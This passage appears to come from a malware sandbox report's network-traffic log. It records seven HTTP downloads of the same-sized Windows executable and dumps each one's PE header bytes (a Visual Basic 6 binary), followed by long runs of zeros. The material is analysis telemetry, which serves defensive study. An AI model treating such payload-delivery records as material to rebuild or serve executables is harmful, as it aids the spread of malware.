00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:38 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:39 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:43 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:49 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:50 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:50 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:51 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
